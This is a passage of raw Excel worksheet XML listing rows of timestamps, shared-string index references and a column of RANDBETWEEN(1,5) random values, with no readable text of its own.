        <v>19393</v>
      </c>
      <c r="F21515">
        <f t="shared" ca="1" si="336"/>
        <v>3</v>
      </c>
    </row>
    <row r="21516" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21516" s="1">
        <v>43075.299328703702</v>
      </c>
      <c r="C21516" t="s">
        <v>48</v>
      </c>
      <c r="E21516" t="s">
        <v>19394</v>
      </c>
      <c r="F21516">
        <f t="shared" ca="1" si="336"/>
        <v>5</v>
      </c>
    </row>
    <row r="21517" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21517" s="1">
        <v>43075.289837962962</v>
      </c>
      <c r="C21517" t="s">
        <v>189</v>
      </c>
      <c r="E21517" s="2" t="s">
        <v>19395</v>
      </c>
      <c r="F21517">
        <f t="shared" ca="1" si="336"/>
        <v>1</v>
      </c>
    </row>
    <row r="21518" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21518" s="1">
        <v>43075.283483796295</v>
      </c>
      <c r="C21518" t="s">
        <v>10</v>
      </c>
      <c r="D21518" t="s">
        <v>86</v>
      </c>
      <c r="E21518" s="2" t="s">
        <v>19396</v>
      </c>
      <c r="F21518">
        <f t="shared" ca="1" si="336"/>
        <v>3</v>
      </c>
    </row>
    <row r="21519" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21519" s="1">
        <v>43075.272627314815</v>
      </c>
      <c r="C21519" t="s">
        <v>60</v>
      </c>
      <c r="E21519" t="s">
        <v>19397</v>
      </c>
      <c r="F21519">
        <f t="shared" ca="1" si="336"/>
        <v>2</v>
      </c>
    </row>
    <row r="21520" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21520" s="1">
        <v>43075.268159722225</v>
      </c>
      <c r="C21520" t="s">
        <v>48</v>
      </c>
      <c r="E21520" t="s">
        <v>19398</v>
      </c>
      <c r="F21520">
        <f t="shared" ca="1" si="336"/>
        <v>1</v>
      </c>
    </row>
    <row r="21521" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21521" s="1">
        <v>43075.235011574077</v>
      </c>
      <c r="C21521" t="s">
        <v>41</v>
      </c>
      <c r="E21521" t="s">
        <v>19399</v>
      </c>
      <c r="F21521">
        <f t="shared" ca="1" si="336"/>
        <v>4</v>
      </c>
    </row>
    <row r="21522" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21522" s="1">
        <v>43075.23159722222</v>
      </c>
      <c r="C21522" t="s">
        <v>48</v>
      </c>
      <c r="E21522" s="2" t="s">
        <v>19400</v>
      </c>
      <c r="F21522">
        <f t="shared" ca="1" si="336"/>
        <v>1</v>
      </c>
    </row>
    <row r="21523" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21523" s="1">
        <v>43075.191481481481</v>
      </c>
      <c r="C21523" t="s">
        <v>41</v>
      </c>
      <c r="E21523" t="s">
        <v>19401</v>
      </c>
      <c r="F21523">
        <f t="shared" ca="1" si="336"/>
        <v>5</v>
      </c>
    </row>
    <row r="21524" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21524" s="1">
        <v>43075.189583333333</v>
      </c>
      <c r="C21524" t="s">
        <v>48</v>
      </c>
      <c r="E21524" s="2" t="s">
        <v>19402</v>
      </c>
      <c r="F21524">
        <f t="shared" ca="1" si="336"/>
        <v>1</v>
      </c>
    </row>
    <row r="21525" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A21525" s="1">
        <v>43075.138912037037</v>
      </c>
      <c r="C21525" t="s">
        <v>158</v>
      </c>
      <c r="E21525" s="2" t="s">
        <v>19403</v>
      </c>
      <c r="F21525">
        <f t="shared" ca="1" si="336"/>
        <v>5</v>
      </c>
    </row>
    <row r="21526" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A21526" s="1">
        <v>43075.12903935185</v>
      </c>
      <c r="C21526" t="s">
        <v>3515</v>
      </c>
      <c r="E21526" s="2" t="s">
        <v>19404</v>
      </c>
      <c r="F21526">
        <f t="shared" ca="1" si="336"/>
        <v>4</v>
      </c>
    </row>
    <row r="21527" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21527" s="1">
        <v>43075.053287037037</v>
      </c>
      <c r="C21527" t="s">
        <v>8364</v>
      </c>
      <c r="E21527" t="s">
        <v>19405</v>
      </c>
      <c r="F21527">
        <f t="shared" ca="1" si="336"/>
        <v>1</v>
      </c>
    </row>
    <row r="21528" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21528" s="1">
        <v>43075.040914351855</v>
      </c>
      <c r="C21528" t="s">
        <v>140</v>
      </c>
      <c r="D21528" t="s">
        <v>141</v>
      </c>
      <c r="E21528" s="2" t="s">
        <v>19406</v>
      </c>
      <c r="F21528">
        <f t="shared" ca="1" si="336"/>
        <v>2</v>
      </c>
    </row>
    <row r="21529" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21529" s="1">
        <v>43075.009120370371</v>
      </c>
      <c r="C21529" t="s">
        <v>454</v>
      </c>
      <c r="E21529" s="2" t="s">
        <v>19407</v>
      </c>
      <c r="F21529">
        <f t="shared" ca="1" si="336"/>
        <v>2</v>
      </c>
    </row>
    <row r="21530" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21530" s="1">
        <v>43074.988923611112</v>
      </c>
      <c r="C21530" t="s">
        <v>1050</v>
      </c>
      <c r="E21530" s="2" t="s">
        <v>19408</v>
      </c>
      <c r="F21530">
        <f t="shared" ca="1" si="336"/>
        <v>4</v>
      </c>
    </row>
    <row r="21531" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21531" s="1">
        <v>43074.971342592595</v>
      </c>
      <c r="C21531" t="s">
        <v>10</v>
      </c>
      <c r="D21531" t="s">
        <v>336</v>
      </c>
      <c r="F21531">
        <f t="shared" ca="1" si="336"/>
        <v>5</v>
      </c>
    </row>
    <row r="21532" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21532" s="1">
        <v>43074.961840277778</v>
      </c>
      <c r="C21532" t="s">
        <v>144</v>
      </c>
      <c r="E21532" t="s">
        <v>19409</v>
      </c>
      <c r="F21532">
        <f t="shared" ca="1" si="336"/>
        <v>4</v>
      </c>
    </row>
    <row r="21533" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21533" s="1">
        <v>43074.883125</v>
      </c>
      <c r="C21533" t="s">
        <v>10</v>
      </c>
      <c r="D21533" t="s">
        <v>271</v>
      </c>
      <c r="E21533" t="s">
        <v>19410</v>
      </c>
      <c r="F21533">
        <f t="shared" ca="1" si="336"/>
        <v>2</v>
      </c>
    </row>
    <row r="21534" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21534" s="1">
        <v>43074.866435185184</v>
      </c>
      <c r="C21534" t="s">
        <v>140</v>
      </c>
      <c r="D21534" t="s">
        <v>847</v>
      </c>
      <c r="E21534" s="2" t="s">
        <v>19411</v>
      </c>
      <c r="F21534">
        <f t="shared" ca="1" si="336"/>
        <v>5</v>
      </c>
    </row>
    <row r="21535" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21535" s="1">
        <v>43074.836504629631</v>
      </c>
      <c r="C21535" t="s">
        <v>253</v>
      </c>
      <c r="E21535" t="s">
        <v>19412</v>
      </c>
      <c r="F21535">
        <f t="shared" ca="1" si="336"/>
        <v>5</v>
      </c>
    </row>
    <row r="21536" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21536" s="1">
        <v>43074.819444444445</v>
      </c>
      <c r="C21536" t="s">
        <v>139</v>
      </c>
      <c r="E21536" t="s">
        <v>19413</v>
      </c>
      <c r="F21536">
        <f t="shared" ca="1" si="336"/>
        <v>3</v>
      </c>
    </row>
    <row r="21537" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A21537" s="1">
        <v>43074.764675925922</v>
      </c>
      <c r="C21537" t="s">
        <v>2545</v>
      </c>
      <c r="E21537" s="2" t="s">
        <v>19414</v>
      </c>
      <c r="F21537">
        <f t="shared" ca="1" si="336"/>
        <v>1</v>
      </c>
    </row>
    <row r="21538" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21538" s="1">
        <v>43074.755509259259</v>
      </c>
      <c r="C21538" t="s">
        <v>10</v>
      </c>
      <c r="D21538" t="s">
        <v>6</v>
      </c>
      <c r="E21538" s="2" t="s">
        <v>19415</v>
      </c>
      <c r="F21538">
        <f t="shared" ca="1" si="336"/>
        <v>4</v>
      </c>
    </row>
    <row r="21539" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21539" s="1">
        <v>43074.6878125</v>
      </c>
      <c r="C21539" t="s">
        <v>721</v>
      </c>
      <c r="E21539" t="s">
        <v>19416</v>
      </c>
      <c r="F21539">
        <f t="shared" ca="1" si="336"/>
        <v>4</v>
      </c>
    </row>
    <row r="21540" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21540" s="1">
        <v>43074.6877662037</v>
      </c>
      <c r="C21540" t="s">
        <v>6</v>
      </c>
      <c r="D21540" t="s">
        <v>25</v>
      </c>
      <c r="E21540" s="2" t="s">
        <v>19417</v>
      </c>
      <c r="F21540">
        <f t="shared" ca="1" si="336"/>
        <v>5</v>
      </c>
    </row>
    <row r="21541" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21541" s="1">
        <v>43074.682546296295</v>
      </c>
      <c r="C21541" t="s">
        <v>10</v>
      </c>
      <c r="D21541" t="s">
        <v>86</v>
      </c>
      <c r="E21541" s="2" t="s">
        <v>19418</v>
      </c>
      <c r="F21541">
        <f t="shared" ca="1" si="336"/>
        <v>3</v>
      </c>
    </row>
    <row r="21542" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21542" s="1">
        <v>43074.67355324074</v>
      </c>
      <c r="C21542" t="s">
        <v>6</v>
      </c>
      <c r="D21542" t="s">
        <v>25</v>
      </c>
      <c r="E21542" t="s">
        <v>19419</v>
      </c>
      <c r="F21542">
        <f t="shared" ca="1" si="336"/>
        <v>3</v>
      </c>
    </row>
    <row r="21543" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A21543" s="1">
        <v>43074.656261574077</v>
      </c>
      <c r="C21543" t="s">
        <v>10</v>
      </c>
      <c r="D21543" t="s">
        <v>80</v>
      </c>
      <c r="E21543" s="2" t="s">
        <v>19420</v>
      </c>
      <c r="F21543">
        <f t="shared" ca="1" si="336"/>
        <v>4</v>
      </c>
    </row>
    <row r="21544" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21544" s="1">
        <v>43074.635694444441</v>
      </c>
      <c r="C21544" t="s">
        <v>10</v>
      </c>
      <c r="D21544" t="s">
        <v>6</v>
      </c>
      <c r="E21544" t="s">
        <v>19421</v>
      </c>
      <c r="F21544">
        <f t="shared" ca="1" si="336"/>
        <v>2</v>
      </c>
    </row>
    <row r="21545" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21545" s="1">
        <v>43074.606261574074</v>
      </c>
      <c r="C21545" t="s">
        <v>10</v>
      </c>
      <c r="D21545" t="s">
        <v>52</v>
      </c>
      <c r="E21545" t="s">
        <v>19422</v>
      </c>
      <c r="F21545">
        <f t="shared" ca="1" si="336"/>
        <v>5</v>
      </c>
    </row>
    <row r="21546" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A21546" s="1">
        <v>43074.57613425926</v>
      </c>
      <c r="C21546" t="s">
        <v>471</v>
      </c>
      <c r="D21546" t="s">
        <v>312</v>
      </c>
      <c r="E21546" s="2" t="s">
        <v>19423</v>
      </c>
      <c r="F21546">
        <f t="shared" ca="1" si="336"/>
        <v>1</v>
      </c>
    </row>
    <row r="21547" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21547" s="1">
        <v>43074.575486111113</v>
      </c>
      <c r="C21547" t="s">
        <v>10</v>
      </c>
      <c r="D21547" t="s">
        <v>17</v>
      </c>
      <c r="E21547" t="s">
        <v>19424</v>
      </c>
      <c r="F21547">
        <f t="shared" ca="1" si="336"/>
        <v>2</v>
      </c>
    </row>
    <row r="21548" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21548" s="1">
        <v>43074.554861111108</v>
      </c>
      <c r="C21548" t="s">
        <v>10</v>
      </c>
      <c r="D21548" t="s">
        <v>6</v>
      </c>
      <c r="E21548" t="s">
        <v>19425</v>
      </c>
      <c r="F21548">
        <f t="shared" ca="1" si="336"/>
        <v>1</v>
      </c>
    </row>
    <row r="21549" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21549" s="1">
        <v>43074.517025462963</v>
      </c>
      <c r="C21549" t="s">
        <v>10</v>
      </c>
      <c r="D21549" t="s">
        <v>1056</v>
      </c>
      <c r="E21549" t="s">
        <v>19426</v>
      </c>
      <c r="F21549">
        <f t="shared" ca="1" si="336"/>
        <v>3</v>
      </c>
    </row>
    <row r="21550" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21550" s="1">
        <v>43074.510625000003</v>
      </c>
      <c r="C21550" t="s">
        <v>41</v>
      </c>
      <c r="E21550" t="s">
        <v>19427</v>
      </c>
      <c r="F21550">
        <f t="shared" ca="1" si="336"/>
        <v>2</v>
      </c>
    </row>
    <row r="21551" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21551" s="1">
        <v>43074.480729166666</v>
      </c>
      <c r="C21551" t="s">
        <v>41</v>
      </c>
      <c r="E21551" t="s">
        <v>11727</v>
      </c>
      <c r="F21551">
        <f t="shared" ca="1" si="336"/>
        <v>4</v>
      </c>
    </row>
    <row r="21552" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A21552" s="1">
        <v>43074.465763888889</v>
      </c>
      <c r="C21552" t="s">
        <v>10</v>
      </c>
      <c r="D21552" t="s">
        <v>36</v>
      </c>
      <c r="E21552" s="2" t="s">
        <v>19428</v>
      </c>
      <c r="F21552">
        <f t="shared" ca="1" si="336"/>
        <v>1</v>
      </c>
    </row>
    <row r="21553" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21553" s="1">
        <v>43074.431967592594</v>
      </c>
      <c r="C21553" t="s">
        <v>10</v>
      </c>
      <c r="D21553" t="s">
        <v>89</v>
      </c>
      <c r="E21553" t="s">
        <v>19429</v>
      </c>
      <c r="F21553">
        <f t="shared" ca="1" si="336"/>
        <v>2</v>
      </c>
    </row>
    <row r="21554" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A21554" s="1">
        <v>43074.425324074073</v>
      </c>
      <c r="C21554" t="s">
        <v>820</v>
      </c>
      <c r="D21554" t="s">
        <v>721</v>
      </c>
      <c r="E21554" s="2" t="s">
        <v>19430</v>
      </c>
      <c r="F21554">
        <f t="shared" ca="1" si="336"/>
        <v>2</v>
      </c>
    </row>
    <row r="21555" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21555" s="1">
        <v>43074.41369212963</v>
      </c>
      <c r="C21555" t="s">
        <v>48</v>
      </c>
      <c r="E21555" t="s">
        <v>19431</v>
      </c>
      <c r="F21555">
        <f t="shared" ca="1" si="336"/>
        <v>5</v>
      </c>
    </row>
    <row r="21556" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21556" s="1">
        <v>43074.413321759261</v>
      </c>
      <c r="C21556" t="s">
        <v>69</v>
      </c>
      <c r="E21556" s="2" t="s">
        <v>19432</v>
      </c>
      <c r="F21556">
        <f t="shared" ca="1" si="336"/>
        <v>2</v>
      </c>
    </row>
    <row r="21557" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21557" s="1">
        <v>43074.412997685184</v>
      </c>
      <c r="C21557" t="s">
        <v>43</v>
      </c>
      <c r="E21557" s="2" t="s">
        <v>19433</v>
      </c>
      <c r="F21557">
        <f t="shared" ca="1" si="336"/>
        <v>2</v>
      </c>
    </row>
    <row r="21558" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21558" s="1">
        <v>43074.407476851855</v>
      </c>
      <c r="C21558" t="s">
        <v>41</v>
      </c>
      <c r="E21558" t="s">
        <v>19434</v>
      </c>
      <c r="F21558">
        <f t="shared" ca="1" si="336"/>
        <v>3</v>
      </c>
    </row>
    <row r="21559" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21559" s="1">
        <v>43074.398506944446</v>
      </c>
      <c r="C21559" t="s">
        <v>10</v>
      </c>
      <c r="D21559" t="s">
        <v>36</v>
      </c>
      <c r="E21559" t="s">
        <v>19435</v>
      </c>
      <c r="F21559">
        <f t="shared" ca="1" si="336"/>
        <v>4</v>
      </c>
    </row>
    <row r="21560" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21560" s="1">
        <v>43074.397951388892</v>
      </c>
      <c r="C21560" t="s">
        <v>17</v>
      </c>
      <c r="E21560" t="s">
        <v>19436</v>
      </c>
      <c r="F21560">
        <f t="shared" ca="1" si="336"/>
        <v>2</v>
      </c>
    </row>
    <row r="21561" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21561" s="1">
        <v>43074.390752314815</v>
      </c>
      <c r="C21561" t="s">
        <v>10</v>
      </c>
      <c r="D21561" t="s">
        <v>39</v>
      </c>
      <c r="E21561" t="s">
        <v>19437</v>
      </c>
      <c r="F21561">
        <f t="shared" ca="1" si="336"/>
        <v>5</v>
      </c>
    </row>
    <row r="21562" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A21562" s="1">
        <v>43074.387766203705</v>
      </c>
      <c r="C21562" t="s">
        <v>50</v>
      </c>
      <c r="E21562" s="2" t="s">
        <v>19438</v>
      </c>
      <c r="F21562">
        <f t="shared" ca="1" si="336"/>
        <v>5</v>
      </c>
    </row>
    <row r="21563" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21563" s="1">
        <v>43074.372361111113</v>
      </c>
      <c r="C21563" t="s">
        <v>6</v>
      </c>
      <c r="D21563" t="s">
        <v>25</v>
      </c>
      <c r="E21563" t="s">
        <v>19439</v>
      </c>
      <c r="F21563">
        <f t="shared" ca="1" si="336"/>
        <v>2</v>
      </c>
    </row>
    <row r="21564" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21564" s="1">
        <v>43074.359525462962</v>
      </c>
      <c r="C21564" t="s">
        <v>10</v>
      </c>
      <c r="D21564" t="s">
        <v>41</v>
      </c>
      <c r="E21564" t="s">
        <v>19440</v>
      </c>
      <c r="F21564">
        <f t="shared" ca="1" si="336"/>
        <v>4</v>
      </c>
    </row>
    <row r="21565" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21565" s="1">
        <v>43074.349768518521</v>
      </c>
      <c r="C21565" t="s">
        <v>41</v>
      </c>
      <c r="E21565" s="2" t="s">
        <v>19441</v>
      </c>
      <c r="F21565">
        <f t="shared" ca="1" si="336"/>
        <v>5</v>
      </c>
    </row>
    <row r="21566" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21566" s="1">
        <v>43074.343842592592</v>
      </c>
      <c r="C21566" t="s">
        <v>41</v>
      </c>
      <c r="E21566" s="2" t="s">
        <v>19442</v>
      </c>
      <c r="F21566">
        <f t="shared" ca="1" si="336"/>
        <v>2</v>
      </c>
    </row>
    <row r="21567" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A21567" s="1">
        <v>43074.33079861111</v>
      </c>
      <c r="C21567" t="s">
        <v>10</v>
      </c>
      <c r="D21567" t="s">
        <v>89</v>
      </c>
      <c r="E21567" s="2" t="s">
        <v>19443</v>
      </c>
      <c r="F21567">
        <f t="shared" ca="1" si="336"/>
        <v>3</v>
      </c>
    </row>
    <row r="21568" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21568" s="1">
        <v>43074.297511574077</v>
      </c>
      <c r="C21568" t="s">
        <v>41</v>
      </c>
      <c r="E21568" t="s">
        <v>19444</v>
      </c>
      <c r="F21568">
        <f t="shared" ca="1" si="336"/>
        <v>2</v>
      </c>
    </row>
    <row r="21569" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21569" s="1">
        <v>43074.294699074075</v>
      </c>
      <c r="C21569" t="s">
        <v>48</v>
      </c>
      <c r="E21569" t="s">
        <v>19445</v>
      </c>
      <c r="F21569">
        <f t="shared" ca="1" si="336"/>
        <v>4</v>
      </c>
    </row>
    <row r="21570" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21570" s="1">
        <v>43074.279074074075</v>
      </c>
      <c r="C21570" t="s">
        <v>1080</v>
      </c>
      <c r="E21570" s="2" t="s">
        <v>19446</v>
      </c>
      <c r="F21570">
        <f t="shared" ref="F21570:F21633" ca="1" si="337">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="21571" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21571" s="1">
        <v>43074.263449074075</v>
      </c>
      <c r="C21571" t="s">
        <v>48</v>
      </c>
      <c r="E21571" t="s">
        <v>19447</v>
      </c>
      <c r="F21571">
        <f t="shared" ca="1" si="337"/>
        <v>5</v>
      </c>
    </row>
    <row r="21572" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21572" s="1">
        <v>43074.255914351852</v>
      </c>
      <c r="C21572" t="s">
        <v>3106</v>
      </c>
      <c r="F21572">
        <f t="shared" ca="1" si="337"/>
        <v>1</v>
      </c>
    </row>
    <row r="21573" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21573" s="1">
        <v>43074.245428240742</v>
      </c>
      <c r="C21573" t="s">
        <v>41</v>
      </c>
      <c r="E21573" t="s">
        <v>19448</v>
      </c>
      <c r="F21573">
        <f t="shared" ca="1" si="337"/>
        <v>4</v>
      </c>
    </row>
    <row r="21574" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21574" s="1">
        <v>43074.236527777779</v>
      </c>
      <c r="C21574" t="s">
        <v>173</v>
      </c>
      <c r="E21574" s="2" t="s">
        <v>19449</v>
      </c>
      <c r="F21574">
        <f t="shared" ca="1" si="337"/>
        <v>4</v>
      </c>
    </row>
    <row r="21575" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21575" s="1">
        <v>43074.217094907406</v>
      </c>
      <c r="C21575" t="s">
        <v>71</v>
      </c>
      <c r="E21575" s="2" t="s">
        <v>19450</v>
      </c>
      <c r="F21575">
        <f t="shared" ca="1" si="337"/>
        <v>2</v>
      </c>
    </row>
    <row r="21576" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21576" s="1">
        <v>43074.187916666669</v>
      </c>
      <c r="C21576" t="s">
        <v>559</v>
      </c>
      <c r="E21576" t="s">
        <v>19451</v>
      </c>
      <c r="F21576">
        <f t="shared" ca="1" si="337"/>
        <v>4</v>
      </c>
    </row>
    <row r="21577" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21577" s="1">
        <v>43074.181435185186</v>
      </c>
      <c r="C21577" t="s">
        <v>3515</v>
      </c>
      <c r="E21577" s="2" t="s">
        <v>19452</v>
      </c>
      <c r="F21577">
        <f t="shared" ca="1" si="337"/>
        <v>1</v>
      </c>
    </row>
    <row r="21578" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21578" s="1">
        <v>43074.164375</v>
      </c>
      <c r="C21578" t="s">
        <v>60</v>
      </c>
      <c r="E21578" t="s">
        <v>19453</v>
      </c>
      <c r="F21578">
        <f t="shared" ca="1" si="337"/>
        <v>3</v>
      </c>
    </row>
    <row r="21579" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21579" s="1">
        <v>43074.164363425924</v>
      </c>
      <c r="C21579" t="s">
        <v>60</v>
      </c>
      <c r="E21579" t="s">
        <v>19453</v>
      </c>
      <c r="F21579">
        <f t="shared" ca="1" si="337"/>
        <v>3</v>
      </c>
    </row>
    <row r="21580" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21580" s="1">
        <v>43074.163587962961</v>
      </c>
      <c r="C21580" t="s">
        <v>65</v>
      </c>
      <c r="E21580" s="2" t="s">
        <v>19454</v>
      </c>
      <c r="F21580">
        <f t="shared" ca="1" si="337"/>
        <v>4</v>
      </c>
    </row>
    <row r="21581" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21581" s="1">
        <v>43074.13517361111</v>
      </c>
      <c r="C21581" t="s">
        <v>3049</v>
      </c>
      <c r="E21581" t="s">
        <v>19455</v>
      </c>
      <c r="F21581">
        <f t="shared" ca="1" si="337"/>
        <v>3</v>
      </c>
    </row>
    <row r="21582" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21582" s="1">
        <v>43074.115717592591</v>
      </c>
      <c r="C21582" t="s">
        <v>229</v>
      </c>
      <c r="E21582" t="s">
        <v>19456</v>
      </c>
      <c r="F21582">
        <f t="shared" ca="1" si="337"/>
        <v>5</v>
      </c>
    </row>
    <row r="21583" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21583" s="1">
        <v>43074.074583333335</v>
      </c>
      <c r="C21583" t="s">
        <v>333</v>
      </c>
      <c r="E21583" s="2" t="s">
        <v>19457</v>
      </c>
      <c r="F21583">
        <f t="shared" ca="1" si="337"/>
        <v>4</v>
      </c>
    </row>
    <row r="21584" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A21584" s="1">
        <v>43074.071469907409</v>
      </c>
      <c r="C21584" t="s">
        <v>454</v>
      </c>
      <c r="E21584" s="2" t="s">
        <v>19458</v>
      </c>
      <c r="F21584">
        <f t="shared" ca="1" si="337"/>
        <v>3</v>
      </c>
    </row>
    <row r="21585" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21585" s="1">
        <v>43073.999583333331</v>
      </c>
      <c r="C21585" t="s">
        <v>41</v>
      </c>
      <c r="E21585" t="s">
        <v>19459</v>
      </c>
      <c r="F21585">
        <f t="shared" ca="1" si="337"/>
        <v>4</v>
      </c>
    </row>
    <row r="21586" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21586" s="1">
        <v>43073.958784722221</v>
      </c>
      <c r="C21586" t="s">
        <v>10</v>
      </c>
      <c r="D21586" t="s">
        <v>56</v>
      </c>
      <c r="F21586">
        <f t="shared" ca="1" si="337"/>
        <v>5</v>
      </c>
    </row>
    <row r="21587" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21587" s="1">
        <v>43073.949259259258</v>
      </c>
      <c r="C21587" t="s">
        <v>229</v>
      </c>
      <c r="E21587" s="2" t="s">
        <v>19460</v>
      </c>
      <c r="F21587">
        <f t="shared" ca="1" si="337"/>
        <v>4</v>
      </c>
    </row>
    <row r="21588" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A21588" s="1">
        <v>43073.892731481479</v>
      </c>
      <c r="C21588" t="s">
        <v>6</v>
      </c>
      <c r="D21588" t="s">
        <v>25</v>
      </c>
      <c r="E21588" s="2" t="s">
        <v>19461</v>
      </c>
      <c r="F21588">
        <f t="shared" ca="1" si="337"/>
        <v>2</v>
      </c>
    </row>
    <row r="21589" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21589" s="1">
        <v>43073.872488425928</v>
      </c>
      <c r="C21589" t="s">
        <v>140</v>
      </c>
      <c r="D21589" t="s">
        <v>46</v>
      </c>
      <c r="E21589" s="2" t="s">
        <v>19462</v>
      </c>
      <c r="F21589">
        <f t="shared" ca="1" si="337"/>
        <v>1</v>
      </c>
    </row>
    <row r="21590" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21590" s="1">
        <v>43073.731793981482</v>
      </c>
      <c r="C21590" t="s">
        <v>10</v>
      </c>
      <c r="D21590" t="s">
        <v>6</v>
      </c>
      <c r="E21590" s="2" t="s">
        <v>19463</v>
      </c>
      <c r="F21590">
        <f t="shared" ca="1" si="337"/>
        <v>5</v>
      </c>
    </row>
    <row r="21591" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21591" s="1">
        <v>43073.719421296293</v>
      </c>
      <c r="C21591" t="s">
        <v>10</v>
      </c>
      <c r="D21591" t="s">
        <v>56</v>
      </c>
      <c r="E21591" s="2" t="s">
        <v>19464</v>
      </c>
      <c r="F21591">
        <f t="shared" ca="1" si="337"/>
        <v>4</v>
      </c>
    </row>
    <row r="21592" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21592" s="1">
        <v>43073.689560185187</v>
      </c>
      <c r="C21592" t="s">
        <v>6</v>
      </c>
      <c r="D21592" t="s">
        <v>25</v>
      </c>
      <c r="E21592" t="s">
        <v>19465</v>
      </c>
      <c r="F21592">
        <f t="shared" ca="1" si="337"/>
        <v>2</v>
      </c>
    </row>
    <row r="21593" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21593" s="1">
        <v>43073.681898148148</v>
      </c>
      <c r="C21593" t="s">
        <v>10</v>
      </c>
      <c r="D21593" t="s">
        <v>163</v>
      </c>
      <c r="E21593" s="2" t="s">
        <v>19466</v>
      </c>
      <c r="F21593">
        <f t="shared" ca="1" si="337"/>
        <v>4</v>
      </c>
    </row>
    <row r="21594" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21594" s="1">
        <v>43073.639756944445</v>
      </c>
      <c r="C21594" t="s">
        <v>10</v>
      </c>
      <c r="D21594" t="s">
        <v>251</v>
      </c>
      <c r="E21594" s="2" t="s">
        <v>19467</v>
      </c>
      <c r="F21594">
        <f t="shared" ca="1" si="337"/>
        <v>3</v>
      </c>
    </row>
    <row r="21595" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21595" s="1">
        <v>43073.639745370368</v>
      </c>
      <c r="C21595" t="s">
        <v>10</v>
      </c>
      <c r="D21595" t="s">
        <v>251</v>
      </c>
      <c r="E21595" s="2" t="s">
        <v>19467</v>
      </c>
      <c r="F21595">
        <f t="shared" ca="1" si="337"/>
        <v>1</v>
      </c>
    </row>
    <row r="21596" spans="1:6" ht="165" x14ac:dyDescent="0.25">
